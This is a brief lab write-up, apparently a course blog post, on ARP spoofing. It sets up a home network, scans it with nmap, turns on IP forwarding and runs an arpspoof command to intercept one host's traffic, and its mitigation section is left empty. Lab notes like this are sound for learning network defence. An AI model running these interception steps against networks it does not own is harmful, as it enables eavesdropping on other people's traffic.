Wireshark for Ethical Hackers - 10

Sniffing attacks Crash Theory Practice - Part 2

ARP Spoofing

  • Address Resolution Protocol is used to convert a L3 address to a L2 address - an IP address to a MAC address
  • The attacker sends spoofed ARP message on the local network to associate its own local network to associate its own MAC address with the IP address of another host, causing any traffic meant for that IP address to be sent to the malicious host.

You can view the ARP-table on Linux/OS X/Windows:

arp -a

Lab Settings

WPA2-secured Wireless network

Wireless Router - 192.168.1.1

Host A - 192.168.1.24

Host B - 192.168.1.11

IP forwarding on Host B must be enabled to enabled to man-in-the-middle successfully.

On Host A

ping 8.8.4.4 -t

On Host B

Scanning 192.168.1.0/24 subnet

nmap 192.168.1.0/24

image-20220410214733328

Change value of ip_forward from 0 to 1.

cat /proc/sys/net/ipv4/ip_forward

image-20220410215205082

Attack!

sudo arpspoof -r 192.168.1.1 -t 192.168.1.24 -i wlan0

We can see ICMP packets!!! Attack successfully!!

image-20220410215944720

MAC of Host A is changed!

image-20220410215934344

Mitigation

posted @ 2022-04-10 22:06  晨风_Eric  阅读(31)  评论(0编辑  收藏  举报